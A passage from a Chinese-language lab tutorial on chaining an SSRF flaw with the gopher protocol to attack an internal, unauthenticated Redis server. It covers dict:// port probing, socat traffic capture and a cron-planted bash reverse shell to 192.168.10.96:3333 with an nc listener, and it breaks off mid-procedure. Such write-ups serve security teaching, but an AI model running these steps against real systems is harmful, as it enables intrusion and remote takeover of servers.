ssrf漏洞(上) · Farmsec Open Source(4)
时间:2022-12-04 19:15 来源:网络整理 作者:采集插件 点击:次
Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。 利用gopher协议getshell 使用ssrf漏洞结合gopher协议攻击内网redis 7.4.1 环境准备 redis未授权环境*2 #192.168.11.203(真实机) 192.168.11.192(模拟机) ssrf漏洞环境(跳板机) #192.168.11.135 kali攻击机 #192.168.10.96redis在内网(开防火墙仅允许ssrf机器访问),kali无法直接访问redis,只能通过ssrf作为跳板机攻击redis。
环境验证: 1)redis测试机(192.168.11.192)kail攻击机可以访问
2)内网redis真实机(192.168.11.203)不可以访问
3)内网攻击机(192.168.11.203)设置 firewall-cmd --add-rich-rule='rule family=ipv4 source address=192.168.11.135 port port=6379 protocol=tcp accept' firewall-cmd --list-all
4)内网攻击机(192.168.11.203)仅可以被ssrf漏洞主机(192.168.11.135)探测到
实验流程: 探测内网发现存在redis主机,推测可能存在未授权漏洞,但kali无法直接尝试,故在本地搭建redis测试环境,抓到攻击流量后转换为gophper通过ssrf服务器传递给内网redis主机 7.4.2 ssrf探测redis服务通过探测发现,内网192.168.11.203开放6379端口,6379为redis默认端口 ?url=dict://192.168.11.203:6379
kali启动流量转发工具socat,目的是抓取到相关的流量内容 192.168.11.192为测试主机 socat -v tcp-listen:6379,fork tcp-connect:192.168.11.192:6379
攻击redis会写入计划任务,计划任务内容如下,因为是反弹且时间为每分钟故须提前开启监听 bash -i >&/dev/tcp/192.168.10.96/3333 0>&1另开一终端,启动监听: nc -lvp 3333
|







